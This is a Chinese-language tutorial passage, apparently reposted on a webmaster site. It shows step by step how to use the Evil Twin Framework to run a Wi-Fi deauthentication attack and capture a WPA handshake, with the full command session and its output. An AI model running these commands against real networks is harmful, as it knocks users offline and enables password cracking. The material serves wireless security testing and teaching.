|
ETF 启用了 AirScanner 模块并分析 IEEE 802.11 数据帧来发现 WPA 握手包。然后 AirInjecto 就可以使用解除认证攻击来强制客户端断开连接,以进行重连。必须在 ETF 上执行下面这些步骤才能完成上面的目标:
- 进入 AirScanner 配置模式:config airscanner
- 设置 AirScanner 不跳信道:config airscanner
- 设置信道以嗅探经过 WiFi 接入点信道的数据(APC):set fixed_sniffing_channel = <APC>
- 使用 CredentialSniffer 插件来启动 AirScanner 模块:start airscanner with credentialsniffer
- 从已嗅探的接入点列表中添加目标接入点的 BSSID(APS):add aps where ssid = <APS>
- 启用 AirInjector 模块,在默认情况下,它会启用解除认证攻击:start airinjector
这些简单的命令设置能让 ETF 在每次测试时执行成功且有效的解除认证攻击。ETF 也能在每次测试的时候捕获 WPA 的握手数据包。下面的代码能让我们看到 ETF 成功的执行情况。
- ███████╗████████╗███████╗
- ██╔════╝╚══██╔══╝██╔════╝
- █████╗ ██║ █████╗
- ██╔══╝ ██║ ██╔══╝
- ███████╗ ██║ ██║
- ╚══════╝ ╚═╝ ╚═╝
- [+] Do you want to load an older session? [Y/n]: n
- [+] Creating new temporary session on 02/08/2018
- [+] Enter the desired session name:
- ETF[etf/aircommunicator/]::> config airscanner
- ETF[etf/aircommunicator/airscanner]::> listargs
- sniffing_interface = wlan1; (var)
- probes = True; (var)
- beacons = True; (var)
- hop_channels = false; (var)
- fixed_sniffing_channel = 11; (var)
- ETF[etf/aircommunicator/airscanner]::> start airscanner with
- arpreplayer caffelatte credentialsniffer packetlogger selfishwifi
- ETF[etf/aircommunicator/airscanner]::> start airscanner with credentialsniffer
- [+] Successfully added credentialsniffer plugin.
- [+] Starting packet sniffer on interface 'wlan1'
- [+] Set fixed channel to 11
- ETF[etf/aircommunicator/airscanner]::> add aps where ssid = CrackWPA
- ETF[etf/aircommunicator/airscanner]::> start airinjector
- ETF[etf/aircommunicator/airscanner]::> [+] Starting deauthentication attack
- - 1000 bursts of 1 packets
- - 1 different packets
- [+] Injection attacks finished executing.
- [+] Starting post injection methods
- [+] Post injection methods finished
- [+] WPA Handshake found for client '70:3e:ac:bb:78:64' and network 'CrackWPA'
使用 ARP 重放攻击并破解 WEP 无线网络 (编辑:惠州站长网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
